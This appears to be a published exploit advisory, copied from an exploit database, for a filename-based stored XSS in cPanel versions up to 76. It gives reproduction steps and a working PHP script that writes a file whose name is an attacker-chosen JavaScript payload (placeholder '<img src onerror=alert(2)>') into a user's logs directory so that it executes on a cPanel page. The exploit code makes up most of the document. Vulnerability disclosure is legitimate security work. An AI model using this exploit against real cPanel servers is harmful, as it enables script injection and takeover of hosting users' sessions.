Below is a copy: cPanel Filename Based Stored XSS <= v76
[+] Title: cPanel Filename Based Stored XSS <= v76
[+] Author: Numan OZDEMIR
[+] Vendor Homepage: cpanel.com
[+] Version: Up to v76.
[+] Discovered by Numan OZDEMIR in InfinitumIT Labs
[+] [email protected] - [email protected]
[~] Description:
Attacker can run JavaScript codes on this page:
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html
[~] How to Reproduce:
Create a file as named with your payload in /home/user/logs directory
or run this php exploit:
<center>
<?php
$p = $_POST['payload'];
$x = get_current_user();
$dir = "/home/".$x."/logs/";
if($_POST){
if(touch($dir.$p)){
die('
Successfully exploited. Visit <br>
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html
');
}else{
die('An error occured.');
}
}else{
echo 'Enter your payload:
<form action="" method="post"><input type="text" name="payload" placeholder="<img src onerror=alert(2)>">
<input type="submit" value=">>"></form>';
}
// end of the script.
?>
Note: You cant create a file as named with / (slash) character by this exploit.
This vulnerability is disclosed by cPanel Team's confirmation.
// for secure days...
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum